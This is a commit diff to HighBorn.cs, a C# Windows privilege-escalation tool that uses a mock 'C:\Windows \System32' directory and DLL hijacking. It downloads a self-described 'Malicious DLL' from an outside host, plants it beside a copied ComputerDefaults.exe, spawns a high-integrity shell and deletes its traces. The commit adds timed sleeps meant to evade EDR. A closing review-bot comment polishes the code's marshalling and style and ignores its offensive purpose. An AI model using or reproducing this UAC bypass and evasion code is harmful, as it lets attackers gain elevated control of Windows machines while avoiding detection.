
Update HighBorn.cs

Added a sleep function which seems to help with EDR evasion.
assume-breach 2 tahun lalu
induk
melakukan
cdace5f80a
1 mengubah file dengan 61 tambahan dan 36 penghapusan
  1. 61 36
      HighBorn/HighBorn.cs

+ 61 - 36
HighBorn/HighBorn.cs

@@ -4,8 +4,6 @@ using System.Runtime.InteropServices;
 using System.Diagnostics;
 using System.Net;
 
-
-
 namespace HighBorn
 {
     class HighBorn
@@ -25,12 +23,31 @@ namespace HighBorn
         [DllImport("kernel32.dll", SetLastError = true)]
         [return: MarshalAs(UnmanagedType.Bool)]
         static extern bool DeleteFileW([MarshalAs(UnmanagedType.LPWStr)]string lpFileName);
-       
-	    [DllImport("kernel32.dll", SetLastError = true)]
+
+        [DllImport("kernel32.dll", SetLastError = true)]
         static extern bool RemoveDirectory(string lpPathName);
 
-		
-	
+        [DllImport("ntdll.dll")]
+        public static extern int NtDelayExecution(bool Alertable, ref long DelayInterval);
+
+        [DllImport("ntdll.dll")]
+        public static extern int ZwSetTimerResolution(uint RequestedResolution, bool Set, out uint ActualResolution);
+
+        private static bool isResolutionSet = false;
+
+        static void SleepShort(float milliseconds)
+        {
+            if (!isResolutionSet)
+            {
+                uint actualResolution;
+                ZwSetTimerResolution(1, true, out actualResolution);
+                isResolutionSet = true;
+            }
+
+            long interval = (long)(-1 * milliseconds * 10000.0f); // Convert to 100-nanosecond intervals
+            NtDelayExecution(false, ref interval);
+        }
+
         public static void Main(string[] args)
         {
             IntPtr wow64Value = IntPtr.Zero;
@@ -47,13 +64,14 @@ namespace HighBorn
             {
                 Console.WriteLine("[-] Unable to create directories");
             }
-			
-			
-			Console.WriteLine("[^] Copying Executable Into Mock Directory");
+
+            SleepShort(2000); // Sleep for 2 seconds
+
+            Console.WriteLine("[^] Copying Executable Into Mock Directory");
             try
             {
-            
-			CopyFile(@"C:\Windows\System32\ComputerDefaults.exe", @"C:\Windows \System32\ComputerDefaults.exe", true);
+
+                CopyFile(@"C:\Windows\System32\ComputerDefaults.exe", @"C:\Windows \System32\ComputerDefaults.exe", true);
 
             }
             catch
@@ -61,40 +79,47 @@ namespace HighBorn
                 Console.WriteLine("[-] Unable to create the mock directories");
             }
 
-			Console.WriteLine("[^] Downloading Malicious DLL");
+            SleepShort(2000); // Sleep for 2 seconds
+
+            Console.WriteLine("[^] Downloading Malicious DLL");
             try
-			{
-			using (WebClient webClient = new WebClient())
-				{
-					webClient.DownloadFile("http://172.16.202.178:9090/secur32.dll", @"C:\Windows\temp\secur32.dll");
-				}
-			}
-			catch
-			{
-				Console.WriteLine("[^] DLL Downloaded");
-			}	
-			
-			CopyFile(@"C:\Windows\temp\secur32.dll", @"C:\Windows \System32\secur32.dll", true);
-			
-			Console.WriteLine("[^] Spawining High Integrity Shell");
+            {
+                using (WebClient webClient = new WebClient())
+                {
+                    webClient.DownloadFile("http://IP:PORT/secur32.dll", @"C:\Windows\temp\secur32.dll");
+                }
+            }
+            catch
+            {
+                Console.WriteLine("[^] DLL Downloaded");
+            }
+
+            CopyFile(@"C:\Windows\temp\secur32.dll", @"C:\Windows \System32\secur32.dll", true);
+
+            SleepShort(2000); // Sleep for 2 seconds
+
+            Console.WriteLine("[^] Spawning High Integrity Shell");
             try
             {
-            		Process.Start(@"C:\Windows \System32\ComputerDefaults.exe").WaitForExit();
+                Process.Start(@"C:\Windows \System32\ComputerDefaults.exe").WaitForExit();
             }
             catch
             {
-                Console.WriteLine("[-] Shell fucked up");
+                Console.WriteLine("[-] Shell messed up");
             }
 
+            SleepShort(2000); // Sleep for 2 seconds
+
             Console.WriteLine("[^] Cleaning Up");
-		
-            	DeleteFileW(@"C:\Windows\temp\secur32.dll");
-        	DeleteFileW(@"C:\Windows \System32\ComputerDefaults.exe");
-		DeleteFileW(@"C:\Windows \System32\secur32.dll");
-		RemoveDirectory(@"C:\Windows \System32\");
-		RemoveDirectory(@"C:\Windows \");
-
-            
+
+            DeleteFileW(@"C:\Windows\temp\secur32.dll");
+	    SleepShort(2000);
+            DeleteFileW(@"C:\Windows \System32\ComputerDefaults.exe");
+            SleepShort(2000);
+	    DeleteFileW(@"C:\Windows \System32\secur32.dll");
+            RemoveDirectory(@"C:\Windows \System32\");
+            RemoveDirectory(@"C:\Windows \");
+
             Wow64RevertWow64FsRedirection(wow64Value);
         }
     }
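Review bot: `SleepShort` in the second hunk (`@@ -25,12 +23,31 @@`) discards the NTSTATUS returned by both `ZwSetTimerResolution` and `NtDelayExecution`, and sets `isResolutionSet = true` even when the resolution call failed, so a failure is neither reported nor retried; the raised resolution is also never released with a `Set = false` call before `Main` returns, which presumably the OS undoes only at process exit. The native `Alertable` and `Set` parameters are one-byte `BOOLEAN`, while a bare `bool` in a `DllImport` signature marshals as a four-byte `BOOL`, so the declarations should read `[MarshalAs(UnmanagedType.U1)] bool Alertable` and `[MarshalAs(UnmanagedType.U1)] bool Set` to match the contract rather than relying on register passing. The literal `2000` with its `// Sleep for 2 seconds` comment is repeated at every call site and would be clearer as one named constant, e.g. `private const float StepDelayMs = 2000f;`. As a point of style, the two `SleepShort(2000);` lines after the `DeleteFileW` calls in the last hunk are indented with tabs although this commit otherwise normalizes the file to spaces. `Main` begins at the end of the second hunk and continues through the later hunks, so its full body is not visible in any one of them.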